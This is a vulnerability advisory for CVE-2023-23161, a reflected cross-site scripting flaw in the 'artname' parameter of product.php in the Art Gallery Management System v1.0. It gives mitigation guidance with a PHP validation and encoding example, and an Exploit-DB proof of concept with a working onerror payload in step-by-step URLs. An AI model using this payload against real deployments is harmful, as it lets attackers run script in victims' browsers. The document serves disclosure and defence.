Vendor: Art Gallery Management System Project
By: Rahul Patwari
CVSS: 6.1 MEDIUM
Reflected Cross-Site Scripting (XSS)
CWE: 79
Product Name: Art Gallery Management System Project
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CVE: CVE-2023-23161
CPE: a:phpgurukul:art_gallery_management_system_project:1.0
Tags: cve,cve2023,art,gallery,xss
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'verified': True, 'fofa-query': 'title="Art Gallery Management System"', 'vendor': 'art_gallery_management_system_project', 'product': 'art_gallery_management_system'}
Platforms Tested: XAMPP / Windows 10
2023

Art Gallery Management System Project v1.0 – Reflected Cross-Site Scripting (XSS)

This vulnerability allows an attacker to inject malicious code into a web application, which is then executed by the victim's browser. In this specific case, the flaw is in the 'artname' parameter of the 'product.php' page. By placing a crafted XSS payload in that parameter, an attacker can trigger the execution of arbitrary JavaScript code in the victim's browser.

Mitigation:

To mitigate this vulnerability, the application should implement proper input validation and output encoding to prevent the execution of malicious code. Specifically, the 'artname' parameter should be properly validated and sanitized before being displayed to the user.
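
The mitigation described above, as an added example that is not taken from the project's source: the page does not show product.php, so the vulnerable pattern, the helper names validate_artname() and e(), and the allow-list policy are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers illustrating the mitigation; not the project's code.
// Assumed vulnerable pattern: the parameter is echoed unencoded, e.g.
//     echo $_GET['artname'];

/** Allow-list check (assumed policy): letters, digits, spaces, hyphens, max 50. */
function validate_artname(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    $value = trim($raw);
    // The u flag makes \p{L}/\p{N} accept non-ASCII names and makes
    // preg_match() fail on invalid UTF-8; markup characters never match.
    if (preg_match('/\A[\p{L}\p{N} \-]{1,50}\z/u', $value) !== 1) {
        return null;
    }
    return $value;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample inputs: the benign value and the URL-decoded value
// from the proof of concept. A real handler would pass
// $_GET['artname'] ?? null instead.
$samples = [
    'prints',
    '<img src=1 onerror=alert(document.domain)>',
];

foreach ($samples as $raw) {
    $artname = validate_artname($raw);
    if ($artname === null) {
        // Rejected input is still encoded before it appears in any message.
        echo 'Invalid art type: ' . e($raw) . PHP_EOL;
        continue;
    }
    // Encode at output even after validation, so a later change to the
    // allow-list cannot reintroduce the injection.
    echo '<h3>' . e($artname) . '</h3>' . PHP_EOL;
}
```

Validation narrows what the parameter may contain, but the output encoding is what keeps the value inert in the HTML response, so both are applied.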

Exploit-DB raw data:

# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23161

# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0

# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints

# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 5- XSS has been triggered.

# Go to this url "https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"
XSS will trigger.